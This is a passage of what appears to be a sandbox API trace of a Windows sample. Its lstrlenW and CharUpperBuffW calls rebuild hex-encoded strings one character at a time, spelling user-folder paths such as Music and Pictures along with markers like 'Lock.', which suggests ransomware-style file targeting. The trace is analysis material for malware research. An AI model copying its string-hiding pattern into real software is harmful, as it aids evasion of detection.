lpMsg=0x8cf488) returned 0 [0082.750] lstrlenW (lpString="63") returned 2 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] lstrlenW (lpString="6B") returned 2 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] lstrlenW (lpString="2E") returned 2 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0082.750] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] lstrlenW (lpString="38") returned 2 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] lstrlenW (lpString="38") returned 2 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] lstrlenW (lpString="38") returned 2 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.750] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] lstrlenW (lpString="20") returned 2 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] lstrlenW (lpString="40") returned 2 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] lstrlenW (lpString="55") returned 2 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] lstrlenW (lpString="73") returned 2 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] lstrlenW (lpString="65") returned 2 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] lstrlenW (lpString="72") returned 2 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.751] lstrlenW (lpString="50") returned 2 [0082.751] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="72") returned 2 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="6F") returned 2 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="66") returned 2 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="69") returned 2 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="6C") returned 2 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="65") returned 2 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="44") returned 2 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="69") returned 2 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.816] lstrlenW (lpString="72") returned 2 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] lstrlenW (lpString="20") returned 2 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] lstrlenW (lpString="5C") returned 2 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] lstrlenW (lpString="4D") returned 2 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] lstrlenW (lpString="75") returned 2 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] lstrlenW (lpString="73") returned 2 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] lstrlenW (lpString="69") returned 2 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] lstrlenW (lpString="63") returned 2 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.817] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] lstrlenW (lpString="5C") returned 2 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] lstrlenW (lpString="20") returned 2 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] lstrlenW (lpString="40") returned 2 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] lstrlenW (lpString="55") returned 2 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.818] lstrlenW (lpString="73") returned 2 [0082.818] lstrlenW (lpString="65") returned 2 [0082.818] lstrlenW (lpString="72") returned 2 [0082.818] lstrlenW (lpString="50") returned 2 [0082.819] lstrlenW (lpString="72") returned 2 [0082.819] lstrlenW (lpString="6F") returned 2 [0082.819] lstrlenW (lpString="66") returned 2 [0082.819] lstrlenW (lpString="69") returned 2 [0082.819] lstrlenW (lpString="6C") returned 2 [0082.819] lstrlenW (lpString="65") returned 2 [0082.819] lstrlenW (lpString="44") returned 2 [0082.819] lstrlenW (lpString="69") returned 2 [0082.819] lstrlenW (lpString="72") returned 2 [0082.819] lstrlenW (lpString="20") returned 2 [0082.819] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.819] lstrlenW (lpString="5C") returned 2 [0082.819] lstrlenW (lpString="4D") returned 2 [0082.819] lstrlenW (lpString="75") returned 2 [0082.819] lstrlenW (lpString="73") returned 2 [0082.819] lstrlenW (lpString="69") returned 2 [0082.819] lstrlenW (lpString="63") returned 2 [0082.819] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.819] lstrlenW (lpString="5C") returned 2 [0082.819] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.860] lstrlenW (lpString="20") returned 2 [0082.860] lstrlenW (lpString="31") returned 2 [0082.860] lstrlenW (lpString="20") returned 2 [0082.860] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.860] lstrlenW (lpString="20") returned 2 [0082.860] lstrlenW (lpString="40") returned 2 [0082.860] lstrlenW (lpString="55") returned 2 [0082.860] lstrlenW (lpString="73") returned 2 [0082.860] lstrlenW (lpString="65") returned 2 [0082.860] lstrlenW (lpString="72") returned 2 [0082.860] lstrlenW (lpString="50") returned 2 [0082.860] lstrlenW (lpString="72") returned 2 [0082.860] lstrlenW (lpString="6F") returned 2 [0082.860] lstrlenW (lpString="66") returned 2 [0082.860] lstrlenW (lpString="69") returned 2 [0082.860] lstrlenW (lpString="6C") returned 2 [0082.860] lstrlenW (lpString="65") returned 2 [0082.860] lstrlenW (lpString="44") returned 2 [0082.860] lstrlenW (lpString="69") returned 2 [0082.860] lstrlenW (lpString="72") returned 2 [0082.860] lstrlenW (lpString="20") returned 2 [0082.860] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.860] lstrlenW (lpString="5C") returned 2 [0082.860] lstrlenW (lpString="50") returned 2 [0082.861] lstrlenW (lpString="69") returned 2 [0082.861] lstrlenW (lpString="63") returned 2 [0082.861] lstrlenW (lpString="74") returned 2 [0082.861] lstrlenW (lpString="75") returned 2 [0082.861] lstrlenW (lpString="72") returned 2 [0082.861] lstrlenW (lpString="65") returned 2 [0082.861] lstrlenW (lpString="73") returned 2 [0082.861] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.861] lstrlenW (lpString="2A") returned 2 [0082.861] lstrlenW (lpString="2E") returned 2 [0082.861] lstrlenW (lpString="2A") returned 2 [0082.861] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.861] lstrlenW (lpString="20") returned 2 [0082.861] lstrlenW (lpString="31") returned 2 [0082.861] lstrlenW (lpString="20") returned 2 [0082.861] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.861] lstrlenW (lpString="20") returned 2 [0082.861] lstrlenW (lpString="31") returned 2 [0082.861] lstrlenW (lpString="20") returned 2 [0082.861] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.861] lstrlenW (lpString="20") returned 2 [0082.861] lstrlenW (lpString="30") returned 2 [0082.861] lstrlenW (lpString="20") returned 2 [0082.900] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.900] lstrlenW (lpString="20") returned 2 [0082.900] lstrlenW (lpString="31") returned 2 [0082.900] lstrlenW (lpString="20") returned 2 [0082.900] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.900] lstrlenW (lpString="4C") returned 2 [0082.900] lstrlenW (lpString="6F") returned 2 [0082.900] lstrlenW (lpString="63") returned 2 [0082.900] lstrlenW (lpString="6B") returned 2 [0082.900] lstrlenW (lpString="2E") returned 2 [0082.900] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.900] lstrlenW (lpString="46") returned 2 [0082.900] lstrlenW (lpString="69") returned 2 [0082.900] lstrlenW (lpString="78") returned 2 [0082.900] lstrlenW (lpString="65") returned 2 [0082.900] lstrlenW (lpString="64") returned 2 [0082.900] lstrlenW (lpString="2E") returned 2 [0082.900] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.900] lstrlenW (lpString="20") returned 2 [0082.901] lstrlenW (lpString="40") returned 2 [0082.901] lstrlenW (lpString="55") returned 2 [0082.901] lstrlenW (lpString="73") returned 2 [0082.901] lstrlenW (lpString="65") returned 2 [0082.901] lstrlenW (lpString="72") returned 2 [0082.901] lstrlenW (lpString="50") returned 2 [0082.901] lstrlenW (lpString="72") returned 2 [0082.901] lstrlenW (lpString="6F") returned 2 [0082.901] lstrlenW (lpString="66") returned 2 [0082.901] lstrlenW (lpString="69") returned 2 [0082.901] lstrlenW (lpString="6C") returned 2 [0082.901] lstrlenW (lpString="65") returned 2 [0082.901] lstrlenW (lpString="44") returned 2 [0082.901] lstrlenW (lpString="69") returned 2 [0082.901] lstrlenW (lpString="72") returned 2 [0082.901] lstrlenW (lpString="20") returned 2 [0082.901] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.901] lstrlenW (lpString="5C") returned 2 [0082.901] lstrlenW (lpString="50") returned 2 [0082.901] lstrlenW (lpString="69") returned 2 [0082.901] lstrlenW (lpString="63") returned 2 [0082.901] lstrlenW (lpString="74") returned 2 [0082.901] lstrlenW (lpString="75") returned 2 [0082.901] lstrlenW (lpString="72") returned 2 [0082.901] lstrlenW (lpString="65") returned 2 [0082.902] lstrlenW (lpString="73") returned 2 [0082.902] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.902] lstrlenW (lpString="2F") returned 2 [0082.913] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.913] lstrlenW (lpString="20") returned 2 [0082.913] lstrlenW (lpString="40") returned 2 [0082.913] lstrlenW (lpString="55") returned 2 [0082.914] lstrlenW (lpString="73") returned 2 [0082.914] lstrlenW (lpString="65") returned 2 [0082.914] lstrlenW (lpString="72") returned 2 [0082.914] lstrlenW (lpString="50") returned 2 [0082.914] lstrlenW (lpString="72") returned 2 [0082.914] lstrlenW (lpString="6F") returned 2 [0082.914] lstrlenW (lpString="66") returned 2 [0082.914] lstrlenW (lpString="69") returned 2 [0082.914] lstrlenW (lpString="6C") returned 2 [0082.914] lstrlenW (lpString="65") returned 2 [0082.914] lstrlenW (lpString="44") returned 2 [0082.914] lstrlenW (lpString="69") returned 2 [0082.914] lstrlenW (lpString="72") returned 2 [0082.914] lstrlenW (lpString="20") returned 2 [0082.914] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.914] lstrlenW (lpString="5C") returned 2 [0082.914] lstrlenW (lpString="50") returned 2 [0082.914] lstrlenW (lpString="69") returned 2 [0082.914] lstrlenW (lpString="63") returned 2 [0082.914] lstrlenW (lpString="74") returned 2 [0082.914] lstrlenW (lpString="75") returned 2 [0082.914] lstrlenW (lpString="72") returned 2 [0082.914] lstrlenW (lpString="65") returned 2 [0082.914] lstrlenW (lpString="73") returned 2 [0082.914] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.915] lstrlenW (lpString="2F") returned 2 [0082.915] lstrlenW (lpString="4C") returned 2 [0082.916] lstrlenW (lpString="6F") returned 2 [0082.916] lstrlenW (lpString="63") returned 2 [0082.916] lstrlenW (lpString="6B") returned 2 [0082.916] lstrlenW (lpString="2E") returned 2 [0082.916] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.916] lstrlenW (lpString="38") returned 2 [0082.916] lstrlenW (lpString="38") returned 2 [0082.916] lstrlenW (lpString="38") returned 2 [0082.916] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.916] lstrlenW (lpString="20") returned 2 [0082.916] lstrlenW (lpString="40") returned 2 [0082.916] lstrlenW (lpString="55") returned 2 [0082.916] lstrlenW (lpString="73") returned 2 [0082.916] lstrlenW (lpString="65") returned 2 [0082.916] lstrlenW (lpString="72") returned 2 [0082.916] lstrlenW (lpString="50") returned 2 [0082.920] lstrlenW (lpString="72") returned 2 [0082.921] lstrlenW (lpString="6F") returned 2 [0082.921] lstrlenW (lpString="66") returned 2 [0082.921] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.921] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.921] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.921] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.925] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.932] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.942] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.942] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.942] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.942] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: 